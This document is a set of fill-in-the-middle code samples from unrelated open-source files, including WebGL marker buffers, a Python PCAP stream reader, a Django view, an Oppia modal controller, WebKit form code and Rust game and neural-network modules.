// we use four floats per vertex, and we have 4 vertices per marker
const stride = 4 * 4;
const indicesPerQuad = 6;
const vertexData = new Float32Array(features.length * stride);
    const indexData = new Uint32Array(indicesPerQuad * features.length);
let arrayIndex = 0;
for (let index = 0; index < features.length; index++) {
const point = quantizedPoints[index];
arrayIndex = stride * index;
// encode the per vertex data
// upper-left
vertexData[arrayIndex + 0] = point.x;
vertexData[arrayIndex + 1] = point.y;
vertexData[arrayIndex + 2] = -0.5;
vertexData[arrayIndex + 3] = -0.5;
// upper-right
vertexData[arrayIndex + 4] = point.x;
vertexData[arrayIndex + 5] = point.y;
vertexData[arrayIndex + 6] = 0.5;
vertexData[arrayIndex + 7] = -0.5;
// lower-left
vertexData[arrayIndex + 8] = point.x;
vertexData[arrayIndex + 9] = point.y;
vertexData[arrayIndex + 10] = -0.5;
vertexData[arrayIndex + 11] = 0.5;
// lower right
vertexData[arrayIndex + 12] = point.x;
vertexData[arrayIndex + 13] = point.y;
vertexData[arrayIndex + 14] = 0.5;
vertexData[arrayIndex + 15] = 0.5;
// encode the index buffer
indexData[indicesPerQuad * index + 0] = 4 * index + 0;
indexData[indicesPerQuad * index + 1] = 4 * index + 1;
indexData[indicesPerQuad * index + 2] = 4 * index + 2;
indexData[indicesPerQuad * index + 3] = 4 * index + 1;
indexData[indicesPerQuad * index + 4] = 4 * index + 3;
indexData[indicesPerQuad * index + 5] = 4 * index + 2;
}
const elementCount = indicesPerQuad * features.length;
return {
vertexData,
indexData,
elementCount
};
}
}<|fim▁end|>
|
import { IPoint, QuantizationTransform, TileData, TileInfo } from '../interfaces';
export default class Tile extends TileBase {
|
<|file_name|>s_pcap.py<|end_file_name|><|fim▁begin|>import dpkt
import socket
import logging
l = logging.getLogger("simuvex.s_pcap")
class PCAP(object):
def __init__(self,path, ip_port_tup, init=True):
self.path = path
self.packet_num = 0
self.pos = 0
self.in_streams = []
self.out_streams = []
#self.in_buf = ''
self.ip = ip_port_tup[0]<|fim▁hole|> if init:
self.initialize(self.path)
def initialize(self,path):
#import ipdb;ipdb.set_trace()
        f = open(path, 'rb')
pcap = dpkt.pcap.Reader(f)
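        # Split the capture into TCP payload streams: packets addressed to
        # (self.ip, self.port) go into out_streams, the rest into in_streams.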
for _,buf in pcap:
#data = dpkt.ethernet.Ethernet(buf).ip.data.data
ip = dpkt.ethernet.Ethernet(buf).ip
tcp = ip.data
myip = socket.inet_ntoa(ip.dst)
            if myip == self.ip and tcp.dport == self.port and len(tcp.data) != 0:
self.out_streams.append((len(tcp.data),tcp.data))
            elif len(tcp.data) != 0:
self.in_streams.append((len(tcp.data),tcp.data))
f.close()
def recv(self, length):
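        # Return up to `length` bytes of the current inbound packet's payload,
        # advancing self.pos / self.packet_num as the packet is consumed.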
#import ipdb;ipdb.set_trace()
temp = 0
#import ipdb;ipdb.set_trace()
#pcap = self.pcap
initial_packet = self.packet_num
plength, pdata = self.in_streams[self.packet_num]
length = min(length, plength)
        if self.pos == 0:
if plength > length:
temp = length
else:
self.packet_num += 1
packet_data = pdata[self.pos:length]
self.pos += temp
else:
if (self.pos + length) >= plength:
rest = plength-self.pos
length = rest
self.packet_num += 1
packet_data = pdata[self.pos:plength]
            if self.packet_num != initial_packet:
self.pos = 0
return packet_data, length
def copy(self):
new_pcap = PCAP(self.path, (self.ip, self.port), init=False)
new_pcap.packet_num = self.packet_num
new_pcap.pos = self.pos
new_pcap.in_streams = self.in_streams
new_pcap.out_streams = self.out_streams
return new_pcap<|fim▁end|>
|
self.port = ip_port_tup[1]
|
<|file_name|>views.py<|end_file_name|><|fim▁begin|>#
# Copyright (C) 2003-2022 Sébastien Helleu <[email protected]>
#
# This file is part of WeeChat.org.
#
# WeeChat.org is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# WeeChat.org is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.<|fim▁hole|>
"""Some useful views."""
from django.views.generic import TemplateView
class TextTemplateView(TemplateView):
"""View for a plain text file."""
def render_to_response(self, context, **response_kwargs):
response_kwargs['content_type'] = 'text/plain'
return super().render_to_response(context, **response_kwargs)<|fim▁end|>
|
#
# You should have received a copy of the GNU General Public License
# along with WeeChat.org. If not, see <https://www.gnu.org/licenses/>.
#
|
<|file_name|>new-chapter-title-modal.controller.ts<|end_file_name|><|fim▁begin|>// Copyright 2020 The Oppia Authors. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS-IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
/**
* @fileoverview Controller for new chapter title modal.
*/
require(
'components/common-layout-directives/common-elements/' +
'confirm-or-cancel-modal.controller.ts');
require('domain/story/story-update.service.ts');
require('pages/story-editor-page/services/story-editor-state.service.ts');
require('domain/exploration/exploration-id-validation.service.ts');
import newChapterConstants from 'assets/constants';
angular.module('oppia').controller('CreateNewChapterModalController', [
'$controller', '$scope', '$uibModalInstance',
'ExplorationIdValidationService', 'StoryEditorStateService',
'StoryUpdateService', 'ValidatorsService', 'nodeTitles',
'MAX_CHARS_IN_EXPLORATION_TITLE',
function(
$controller, $scope, $uibModalInstance,
ExplorationIdValidationService, StoryEditorStateService,
StoryUpdateService, ValidatorsService, nodeTitles,
MAX_CHARS_IN_EXPLORATION_TITLE) {
$controller('ConfirmOrCancelModalController', {
$scope: $scope,
$uibModalInstance: $uibModalInstance
});
$scope.init = function() {
$scope.title = '';
$scope.explorationId = '';
$scope.invalidExpId = '';
$scope.nodeTitles = nodeTitles;
$scope.errorMsg = null;
$scope.invalidExpErrorString = 'Please enter a valid exploration id.';
$scope.MAX_CHARS_IN_EXPLORATION_TITLE = MAX_CHARS_IN_EXPLORATION_TITLE;
$scope.story = StoryEditorStateService.getStory();
$scope.nodeId = $scope.story.getStoryContents().getNextNodeId();
$scope.editableThumbnailFilename = '';
$scope.editableThumbnailBgColor = '';
$scope.allowedBgColors = (
newChapterConstants.ALLOWED_THUMBNAIL_BG_COLORS.chapter);
StoryUpdateService.addStoryNode($scope.story, $scope.title);
};
$scope.init();
$scope.updateThumbnailFilename = function(
newThumbnailFilename) {
StoryUpdateService.setStoryNodeThumbnailFilename(
$scope.story, $scope.nodeId, newThumbnailFilename);
$scope.editableThumbnailFilename = newThumbnailFilename;
$scope.$applyAsync();
};
$scope.updateThumbnailBgColor = function(newThumbnailBgColor) {
StoryUpdateService.setStoryNodeThumbnailBgColor(
$scope.story, $scope.nodeId, newThumbnailBgColor);
$scope.editableThumbnailBgColor = newThumbnailBgColor;
};
$scope.updateTitle = function() {
StoryUpdateService.setStoryNodeTitle(
$scope.story, $scope.nodeId, $scope.title);
};
$scope.cancel = function() {
StoryUpdateService.deleteStoryNode($scope.story, $scope.nodeId);
$uibModalInstance.dismiss();
};
$scope.updateExplorationId = function() {
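      // Reject exploration ids already used by another chapter in this story
      // before validating or saving the new chapter.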
var nodes = $scope.story.getStoryContents().getNodes();
for (var i = 0; i < nodes.length; i++) {
if (nodes[i].getExplorationId() === $scope.explorationId) {
$scope.invalidExpErrorString = (
'The given exploration already exists in the story.');
$scope.invalidExpId = true;
return;
}
}
if (StoryEditorStateService.isStoryPublished()) {
ExplorationIdValidationService.isExpPublishedAsync(
$scope.explorationId).then(function(expIdIsValid) {
$scope.expIdIsValid = expIdIsValid;
if ($scope.expIdIsValid) {
StoryUpdateService.setStoryNodeExplorationId(
$scope.story, $scope.nodeId, $scope.explorationId);
$uibModalInstance.close();
} else {
$scope.invalidExpId = true;
}
});
} else {
StoryUpdateService.setStoryNodeExplorationId(
$scope.story, $scope.nodeId, $scope.explorationId);
$uibModalInstance.close();
}
};
$scope.resetErrorMsg = function() {
$scope.errorMsg = null;
$scope.invalidExpId = false;
$scope.invalidExpErrorString = 'Please enter a valid exploration id.';
};
$scope.validateExplorationId = function() {
return ValidatorsService.isValidExplorationId(
$scope.explorationId, false);
};
$scope.isValid = function() {
return Boolean(
$scope.title &&
ValidatorsService.isValidExplorationId($scope.explorationId, false) &&
$scope.editableThumbnailFilename);
};
$scope.save = function() {
if ($scope.nodeTitles.indexOf($scope.title) !== -1) {
$scope.errorMsg = 'A chapter with this title already exists';
return;
}<|fim▁hole|> $scope.updateTitle();
$scope.updateExplorationId();
};
}
]);<|fim▁end|>
| |
<|file_name|>FormAssociatedElement.cpp<|end_file_name|><|fim▁begin|>/*
* Copyright (C) 1999 Lars Knoll ([email protected])
* (C) 1999 Antti Koivisto ([email protected])
* (C) 2001 Dirk Mueller ([email protected])
* Copyright (C) 2004, 2005, 2006, 2007 Apple Inc. All rights reserved.
* (C) 2006 Alexey Proskuryakov ([email protected])
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Library General Public
* License as published by the Free Software Foundation; either
* version 2 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Library General Public License for more details.
*
* You should have received a copy of the GNU Library General Public License
* along with this library; see the file COPYING.LIB. If not, write to
* the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
* Boston, MA 02110-1301, USA.
*
*/<|fim▁hole|>#include "EditorClient.h"
#include "FormController.h"
#include "Frame.h"
#include "HTMLFormControlElement.h"
#include "HTMLFormElement.h"
#include "HTMLNames.h"
#include "HTMLObjectElement.h"
#include "IdTargetObserver.h"
#include "ValidityState.h"
namespace WebCore {
using namespace HTMLNames;
class FormAttributeTargetObserver : IdTargetObserver {
WTF_MAKE_FAST_ALLOCATED;
public:
static PassOwnPtr<FormAttributeTargetObserver> create(const AtomicString& id, FormAssociatedElement*);
virtual void idTargetChanged() OVERRIDE;
private:
FormAttributeTargetObserver(const AtomicString& id, FormAssociatedElement*);
FormAssociatedElement* m_element;
};
FormAssociatedElement::FormAssociatedElement()
: m_form(0)
{
}
FormAssociatedElement::~FormAssociatedElement()
{
setForm(0);
}
ValidityState* FormAssociatedElement::validity()
{
if (!m_validityState)
m_validityState = ValidityState::create(this);
return m_validityState.get();
}
void FormAssociatedElement::didMoveToNewDocument(Document* oldDocument)
{
HTMLElement* element = toHTMLElement(this);
if (oldDocument && element->fastHasAttribute(formAttr))
resetFormAttributeTargetObserver();
}
void FormAssociatedElement::insertedInto(ContainerNode* insertionPoint)
{
resetFormOwner();
if (!insertionPoint->inDocument())
return;
HTMLElement* element = toHTMLElement(this);
if (element->fastHasAttribute(formAttr))
resetFormAttributeTargetObserver();
}
void FormAssociatedElement::removedFrom(ContainerNode* insertionPoint)
{
HTMLElement* element = toHTMLElement(this);
if (insertionPoint->inDocument() && element->fastHasAttribute(formAttr))
m_formAttributeTargetObserver = nullptr;
// If the form and element are both in the same tree, preserve the connection to the form.
// Otherwise, null out our form and remove ourselves from the form's list of elements.
if (m_form && element->highestAncestor() != m_form->highestAncestor())
setForm(0);
}
HTMLFormElement* FormAssociatedElement::findAssociatedForm(const HTMLElement* element, HTMLFormElement* currentAssociatedForm)
{
const AtomicString& formId(element->fastGetAttribute(formAttr));
if (!formId.isNull() && element->inDocument()) {
// The HTML5 spec says that the element should be associated with
// the first element in the document to have an ID that equal to
// the value of form attribute, so we put the result of
// treeScope()->getElementById() over the given element.
HTMLFormElement* newForm = 0;
Element* newFormCandidate = element->treeScope()->getElementById(formId);
if (newFormCandidate && newFormCandidate->hasTagName(formTag))
newForm = static_cast<HTMLFormElement*>(newFormCandidate);
return newForm;
}
if (!currentAssociatedForm)
return element->findFormAncestor();
return currentAssociatedForm;
}
void FormAssociatedElement::formRemovedFromTree(const Node* formRoot)
{
ASSERT(m_form);
if (toHTMLElement(this)->highestAncestor() != formRoot)
setForm(0);
}
void FormAssociatedElement::setForm(HTMLFormElement* newForm)
{
if (m_form == newForm)
return;
willChangeForm();
if (m_form)
m_form->removeFormElement(this);
m_form = newForm;
if (m_form)
m_form->registerFormElement(this);
didChangeForm();
}
void FormAssociatedElement::willChangeForm()
{
}
void FormAssociatedElement::didChangeForm()
{
}
void FormAssociatedElement::formWillBeDestroyed()
{
ASSERT(m_form);
if (!m_form)
return;
willChangeForm();
m_form = 0;
didChangeForm();
}
void FormAssociatedElement::resetFormOwner()
{
HTMLFormElement* originalForm = m_form;
setForm(findAssociatedForm(toHTMLElement(this), m_form));
HTMLElement* element = toHTMLElement(this);
if (m_form && m_form != originalForm && m_form->inDocument())
element->document()->didAssociateFormControl(element);
}
void FormAssociatedElement::formAttributeChanged()
{
HTMLElement* element = toHTMLElement(this);
if (!element->fastHasAttribute(formAttr)) {
// The form attribute removed. We need to reset form owner here.
HTMLFormElement* originalForm = m_form;
setForm(element->findFormAncestor());
HTMLElement* element = toHTMLElement(this);
if (m_form && m_form != originalForm && m_form->inDocument())
element->document()->didAssociateFormControl(element);
m_formAttributeTargetObserver = nullptr;
} else {
resetFormOwner();
if (element->inDocument())
resetFormAttributeTargetObserver();
}
}
bool FormAssociatedElement::customError() const
{
const HTMLElement* element = toHTMLElement(this);
return element->willValidate() && !m_customValidationMessage.isEmpty();
}
bool FormAssociatedElement::hasBadInput() const
{
return false;
}
bool FormAssociatedElement::patternMismatch() const
{
return false;
}
bool FormAssociatedElement::rangeOverflow() const
{
return false;
}
bool FormAssociatedElement::rangeUnderflow() const
{
return false;
}
bool FormAssociatedElement::stepMismatch() const
{
return false;
}
bool FormAssociatedElement::tooLong() const
{
return false;
}
bool FormAssociatedElement::typeMismatch() const
{
return false;
}
bool FormAssociatedElement::valid() const
{
bool someError = typeMismatch() || stepMismatch() || rangeUnderflow() || rangeOverflow()
|| tooLong() || patternMismatch() || valueMissing() || hasBadInput() || customError();
return !someError;
}
bool FormAssociatedElement::valueMissing() const
{
return false;
}
String FormAssociatedElement::customValidationMessage() const
{
return m_customValidationMessage;
}
String FormAssociatedElement::validationMessage() const
{
return customError() ? m_customValidationMessage : String();
}
void FormAssociatedElement::setCustomValidity(const String& error)
{
m_customValidationMessage = error;
}
void FormAssociatedElement::resetFormAttributeTargetObserver()
{
m_formAttributeTargetObserver = FormAttributeTargetObserver::create(toHTMLElement(this)->fastGetAttribute(formAttr), this);
}
void FormAssociatedElement::formAttributeTargetChanged()
{
resetFormOwner();
}
const AtomicString& FormAssociatedElement::name() const
{
const AtomicString& name = toHTMLElement(this)->getNameAttribute();
return name.isNull() ? emptyAtom : name;
}
bool FormAssociatedElement::isFormControlElementWithState() const
{
return false;
}
const HTMLElement* toHTMLElement(const FormAssociatedElement* associatedElement)
{
if (associatedElement->isFormControlElement())
return static_cast<const HTMLFormControlElement*>(associatedElement);
// Assumes the element is an HTMLObjectElement
const HTMLElement* element = static_cast<const HTMLObjectElement*>(associatedElement);
ASSERT(element->hasTagName(objectTag));
return element;
}
HTMLElement* toHTMLElement(FormAssociatedElement* associatedElement)
{
return const_cast<HTMLElement*>(toHTMLElement(static_cast<const FormAssociatedElement*>(associatedElement)));
}
PassOwnPtr<FormAttributeTargetObserver> FormAttributeTargetObserver::create(const AtomicString& id, FormAssociatedElement* element)
{
return adoptPtr(new FormAttributeTargetObserver(id, element));
}
FormAttributeTargetObserver::FormAttributeTargetObserver(const AtomicString& id, FormAssociatedElement* element)
: IdTargetObserver(toHTMLElement(element)->treeScope()->idTargetObserverRegistry(), id)
, m_element(element)
{
}
void FormAttributeTargetObserver::idTargetChanged()
{
m_element->formAttributeTargetChanged();
}
} // namespace Webcore<|fim▁end|>
|
#include "config.h"
#include "FormAssociatedElement.h"
|
<|file_name|>cge_utils.rs<|end_file_name|><|fim▁begin|>use rand::{thread_rng, Rng};
use cge::Network;
use cge::gene::{GeneExtras, Gene};
pub trait Mutation {
fn add_subnetwork(&mut self, input: usize, output: usize, inputs: usize);
fn add_forward(&mut self, input: usize, output: usize);
fn add_recurrent(&mut self, input: usize, output: usize);
fn add_bias(&mut self, output: usize);<|fim▁hole|> fn add_input(&mut self, input: usize, output: usize);
fn remove_connection(&mut self, index: usize, output: usize);
fn previous_neuron_index(&self, index: usize) -> Option<usize>;
}
impl Mutation for Network {
// inputs is the number of inputs to the network
// id is the id of the new neuron
// output is the index to put the neuron at
fn add_subnetwork(&mut self, id: usize, output: usize, inputs: usize) {
let mut rng = thread_rng();
let mut input_count = 0;
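        // Connect each network input with 50% probability; if none were
        // chosen, fall back to a single randomly selected input below.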
for i in 0..inputs {
if rng.gen() {
self.genome.insert(output, Gene::input(1.0, i));
input_count += 1;
}
}
if input_count == 0 {
self.genome.insert(output, Gene::input(1.0, rng.gen_range(0, inputs)));
input_count = 1;
}
self.genome.insert(output, Gene::neuron(1.0, id, input_count));
let prev_index = self.previous_neuron_index(output);
if let Some(i) = prev_index {
let (_, _, _, inputs) = self.genome[i].ref_mut_neuron().unwrap();
*inputs += 1;
}
self.size = self.genome.len() - 1;
}
// input is the id of the neuron to take input from
// output is the index to put the jumper at
fn add_forward(&mut self, input: usize, output: usize) {
self.genome.insert(output, Gene::forward(1.0, input));
self.size = self.genome.len() - 1;
let prev_index = self.previous_neuron_index(output).unwrap();
let (_, _, _, inputs) = self.genome[prev_index].ref_mut_neuron().unwrap();
*inputs += 1;
}
// input is the id of the neuron to take input from
// output is the index to put the jumper at
fn add_recurrent(&mut self, input: usize, output: usize) {
self.genome.insert(output, Gene::recurrent(1.0, input));
self.size = self.genome.len() - 1;
let prev_index = self.previous_neuron_index(output).unwrap();
let (_, _, _, inputs) = self.genome[prev_index].ref_mut_neuron().unwrap();
*inputs += 1;
}
// input is the id of the input to add a connection from
// output is the index to put the input connection at
fn add_input(&mut self, input: usize, output: usize) {
self.genome.insert(output, Gene::input(1.0, input));
self.size = self.genome.len() - 1;
let prev_index = self.previous_neuron_index(output).unwrap();
let (_, _, _, inputs) = self.genome[prev_index].ref_mut_neuron().unwrap();
*inputs += 1;
}
// output is the index to put the bias at
fn add_bias(&mut self, output: usize) {
self.genome.insert(output, Gene::bias(1.0));
self.size = self.genome.len() - 1;
let prev_index = self.previous_neuron_index(output).unwrap();
let (_, _, _, inputs) = self.genome[prev_index].ref_mut_neuron().unwrap();
*inputs += 1;
}
// output is the id of the neuron to remove the connection from
// index is the index of the gene to remove
fn remove_connection(&mut self, index: usize, output: usize) {
self.genome.remove(index);
self.size = self.genome.len() - 1;
let neuron_index = match self.get_neuron_index(output) {
Some(v) => v,
None => {
println!("{}", output);
println!("{:?}", self);
panic!();
}
};
let (_, _, _, inputs) = self.genome[neuron_index].ref_mut_neuron().expect("bar");
*inputs -= 1;
}
// get index of the first neuron before the index
// to prevent code duplication
fn previous_neuron_index(&self, index: usize) -> Option<usize> {
for i in (0..index).rev() {
if let GeneExtras::Neuron(_, _) = self.genome[i].variant {
return Some(i);
}
}
None
}
}<|fim▁end|>
| |
<|file_name|>_size.py<|end_file_name|><|fim▁begin|>import _plotly_utils.basevalidators
<|fim▁hole|> self,
plotly_name="size",
parent_name="histogram.marker.colorbar.tickfont",
**kwargs
):
super(SizeValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
min=kwargs.pop("min", 1),
role=kwargs.pop("role", "style"),
**kwargs
)<|fim▁end|>
|
class SizeValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
|
<|file_name|>explicit_self_xcrate_exe.rs<|end_file_name|><|fim▁begin|>// Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// xfail-fast
// aux-build:explicit_self_xcrate.rs
extern mod explicit_self_xcrate;
use explicit_self_xcrate::{Foo, Bar};<|fim▁hole|> x.f();
}<|fim▁end|>
|
pub fn main() {
let x = Bar { x: ~"hello" };
|
<|file_name|>view.rs<|end_file_name|><|fim▁begin|>// +--------------------------------------------------------------------------+
// | Copyright 2016 Matthew D. Steele <[email protected]> |
// | |
// | This file is part of System Syzygy. |
// | |
// | System Syzygy is free software: you can redistribute it and/or modify it |
// | under the terms of the GNU General Public License as published by the |
// | Free Software Foundation, either version 3 of the License, or (at your |
// | option) any later version. |
// | |
// | System Syzygy is distributed in the hope that it will be useful, but |
// | WITHOUT ANY WARRANTY; without even the implied warranty of |
// | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU |
// | General Public License for details. |
// | |
// | You should have received a copy of the GNU General Public License along |
// | with System Syzygy. If not, see <http://www.gnu.org/licenses/>. |
// +--------------------------------------------------------------------------+
use std::rc::Rc;
use super::scenes;
use crate::elements::{FadeStyle, PuzzleCmd, PuzzleCore, PuzzleView};
use crate::gui::{<|fim▁hole|>};
use crate::modes::SOLVED_INFO_TEXT;
use crate::save::{Game, LineState, PuzzleState};
// ========================================================================= //
pub struct View {
core: PuzzleCore<()>,
grid1: LetterGrid,
grid2: LetterGrid,
answers: AnswersDisplay,
delay: i32,
}
impl View {
pub fn new(
resources: &mut Resources,
visible: Rect,
state: &LineState,
) -> View {
let mut core = {
let fade = (FadeStyle::LeftToRight, FadeStyle::LeftToRight);
let intro = scenes::compile_intro_scene(resources);
let outro = scenes::compile_outro_scene(resources);
PuzzleCore::new(resources, visible, state, fade, intro, outro)
};
core.add_extra_scene(scenes::compile_ugrent_midscene(resources));
View {
core,
grid1: LetterGrid::new(resources, 80, 48, false),
grid2: LetterGrid::new(resources, 320, 48, true),
answers: AnswersDisplay::new(resources, 168, 272),
delay: 0,
}
}
}
impl Element<Game, PuzzleCmd> for View {
fn draw(&self, game: &Game, canvas: &mut Canvas) {
let state = &game.cross_the_line;
self.core.draw_back_layer(canvas);
self.grid1.draw(state, canvas);
self.grid2.draw(state, canvas);
self.answers.draw(state, canvas);
self.core.draw_middle_layer(canvas);
self.core.draw_front_layer(canvas, state);
}
fn handle_event(
&mut self,
event: &Event,
game: &mut Game,
) -> Action<PuzzleCmd> {
let state = &mut game.cross_the_line;
let mut action = self.core.handle_event(event, state);
if !action.should_stop() && event == &Event::ClockTick {
if self.delay > 0 {
self.delay -= 1;
if self.delay == 0 {
self.grid1.reset();
self.grid2.reset();
if state.is_solved() {
self.core.begin_outro_scene();
action = action.and_return(PuzzleCmd::Save);
}
action.also_redraw();
}
}
}
if !action.should_stop() && self.delay == 0 {
let mut subaction = self.grid1.handle_event(event, state);
if !subaction.should_stop() {
subaction.merge(self.grid2.handle_event(event, state));
}
if let Some(&()) = subaction.value() {
if let Some(index1) = self.grid1.selected {
if let Some(index2) = self.grid2.selected {
self.grid1.override_grid =
Some((state.num_cols(), state.grid1().to_vec()));
self.grid2.override_grid =
Some((state.num_cols(), state.grid2().to_vec()));
self.delay = 20;
if state.pick_chars(index1, index2) {
action.also_play_sound(Sound::mid_puzzle_chime());
} else {
self.grid1.error = true;
self.grid2.error = true;
action.also_play_sound(Sound::talk_annoyed_hi());
}
}
}
}
action.merge(subaction.but_no_value());
}
if !action.should_stop() && self.delay == 0 {
let subaction = self.answers.handle_event(event, state);
action.merge(subaction.but_no_value());
}
if !action.should_stop() && self.delay == 0 {
self.core.begin_character_scene_on_click(event);
}
action
}
}
impl PuzzleView for View {
fn info_text(&self, game: &Game) -> &'static str {
if game.cross_the_line.is_solved() {
SOLVED_INFO_TEXT
} else {
INFO_BOX_TEXT
}
}
fn undo(&mut self, _: &mut Game) {}
fn redo(&mut self, _: &mut Game) {}
fn reset(&mut self, game: &mut Game) {
self.core.clear_undo_redo();
game.cross_the_line.reset();
}
fn solve(&mut self, game: &mut Game) {
game.cross_the_line.solve();
self.core.begin_outro_scene();
}
fn drain_queue(&mut self) {
for entry in self.core.drain_queue() {
match entry {
(0, -1) => {
self.grid1.override_grid = Some((1, Vec::new()));
self.grid2.override_grid = Some((1, Vec::new()));
}
(0, 0) => {
self.grid1.override_grid = None;
self.grid2.override_grid = None;
}
(0, 1) => {
self.grid1.override_grid =
Some((4, "SAFE".chars().collect()));
self.grid2.override_grid =
Some((4, "FACE".chars().collect()));
}
(1, index) => {
if index >= 0 {
self.grid1.selected = Some(index as usize);
} else {
self.grid1.selected = None;
}
}
(2, index) => {
if index >= 0 {
self.grid2.selected = Some(index as usize);
} else {
self.grid2.selected = None;
}
}
(3, hide) => {
self.answers.filtered = hide != 0;
}
_ => {}
}
}
}
}
// ========================================================================= //
const BOX_USIZE: u32 = 24;
const BOX_SIZE: i32 = BOX_USIZE as i32;
const MAX_GRID_WIDTH: u32 = 176;
const MAX_GRID_HEIGHT: u32 = 144;
struct LetterGrid {
left: i32,
top: i32,
is_grid_2: bool,
font: Rc<Font>,
selected: Option<usize>,
override_grid: Option<(i32, Vec<char>)>,
error: bool,
}
impl LetterGrid {
fn new(
resources: &mut Resources,
left: i32,
top: i32,
is_grid_2: bool,
) -> LetterGrid {
LetterGrid {
left,
top,
is_grid_2,
font: resources.get_font("block"),
selected: None,
override_grid: None,
error: false,
}
}
fn reset(&mut self) {
self.selected = None;
self.override_grid = None;
self.error = false;
}
fn max_rect(&self) -> Rect {
Rect::new(self.left, self.top, MAX_GRID_WIDTH, MAX_GRID_HEIGHT)
}
fn grid_rect(&self, num_cols: i32, num_chars: usize) -> Rect {
let num_rows = (num_chars as i32 + num_cols - 1) / num_cols;
let width = num_cols * BOX_SIZE;
let height = num_rows * BOX_SIZE;
let left = self.left + (MAX_GRID_WIDTH as i32 - width) / 2;
let top = self.top + (MAX_GRID_HEIGHT as i32 - height) / 2;
Rect::new(left, top, width as u32, height as u32)
}
}
impl Element<LineState, ()> for LetterGrid {
fn draw(&self, state: &LineState, canvas: &mut Canvas) {
let (num_cols, grid) =
if let Some((num_cols, ref grid)) = self.override_grid {
(num_cols, grid.as_slice())
} else if self.is_grid_2 {
(state.num_cols(), state.grid2())
} else {
(state.num_cols(), state.grid1())
};
let grid_rect = self.grid_rect(num_cols, grid.len());
let mut col = 0;
let mut row = 0;
for (index, &chr) in grid.iter().enumerate() {
let box_left = grid_rect.left() + col * BOX_SIZE;
let box_top = grid_rect.top() + row * BOX_SIZE;
if self.selected == Some(index) {
let rect = Rect::new(box_left, box_top, BOX_USIZE, BOX_USIZE);
let color =
if self.error { (128, 64, 64) } else { (255, 255, 128) };
canvas.fill_rect(color, rect);
}
let pt =
Point::new(box_left + BOX_SIZE / 2, box_top + BOX_SIZE - 3);
canvas.draw_char(&self.font, Align::Center, pt, chr);
col += 1;
if col >= num_cols {
col = 0;
row += 1;
}
}
}
fn handle_event(
&mut self,
event: &Event,
state: &mut LineState,
) -> Action<()> {
match event {
&Event::MouseDown(pt) => {
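                // Map the click to a grid cell; clicking the already-selected
                // cell or empty space clears the selection instead.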
let num_cols = state.num_cols();
let num_chars = if self.is_grid_2 {
state.grid2().len()
} else {
state.grid1().len()
};
let rect = self.grid_rect(num_cols, num_chars);
let mut new_selected = self.selected;
if rect.contains_point(pt) {
let col = (pt.x() - rect.left()) / BOX_SIZE;
let row = (pt.y() - rect.top()) / BOX_SIZE;
let index = (row * num_cols + col) as usize;
if index >= num_chars || self.selected == Some(index) {
new_selected = None;
} else {
new_selected = Some(index);
}
} else if self.max_rect().contains_point(pt) {
new_selected = None;
}
if new_selected != self.selected {
self.selected = new_selected;
return Action::redraw().and_return(());
}
}
_ => {}
}
Action::ignore()
}
}
// ========================================================================= //
const FILTER: &[(bool, bool)] = &[
(true, false),
(false, false),
(true, false),
(false, true),
(true, true),
(false, false),
(false, true),
(false, false),
(true, false),
(false, true),
];
struct AnswersDisplay {
left: i32,
top: i32,
font: Rc<Font>,
filtered: bool,
}
impl AnswersDisplay {
fn new(resources: &mut Resources, left: i32, top: i32) -> AnswersDisplay {
AnswersDisplay {
left,
top,
font: resources.get_font("block"),
filtered: false,
}
}
}
impl Element<LineState, ()> for AnswersDisplay {
fn draw(&self, state: &LineState, canvas: &mut Canvas) {
for stage in 0..state.current_stage() {
let (chr1, chr2) = state.stage_letters(stage);
let cx = self.left + stage * BOX_SIZE + BOX_SIZE / 2;
if !self.filtered || FILTER[stage as usize].0 {
let pt1 = Point::new(cx, self.top + BOX_SIZE - 3);
canvas.draw_char(&self.font, Align::Center, pt1, chr1);
}
if !self.filtered || FILTER[stage as usize].1 {
let pt2 = Point::new(cx, self.top + 2 * BOX_SIZE - 3);
canvas.draw_char(&self.font, Align::Center, pt2, chr2);
}
}
}
fn handle_event(
&mut self,
event: &Event,
_state: &mut LineState,
) -> Action<()> {
match event {
_ => Action::ignore(),
}
}
}
// ========================================================================= //
const INFO_BOX_TEXT: &str = "\
Your goal is to find the discrepancy between the
two upper grids.
Each of the two upper grids contains a character
that does not appear in the other. $M{Tap}{Click} each of
those two characters to proceed. If you choose
incorrectly, the grids will rescramble and you
will have to try again.
$M{Tap}{Click} on a character in the scene to hear their
words of wisdom.";
// ========================================================================= //<|fim▁end|>
|
Action, Align, Canvas, Element, Event, Font, Point, Rect, Resources, Sound,
|
<|file_name|>PrettyPrintJSONWriter.java<|end_file_name|><|fim▁begin|>/*
* Copyright 2004-2008 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
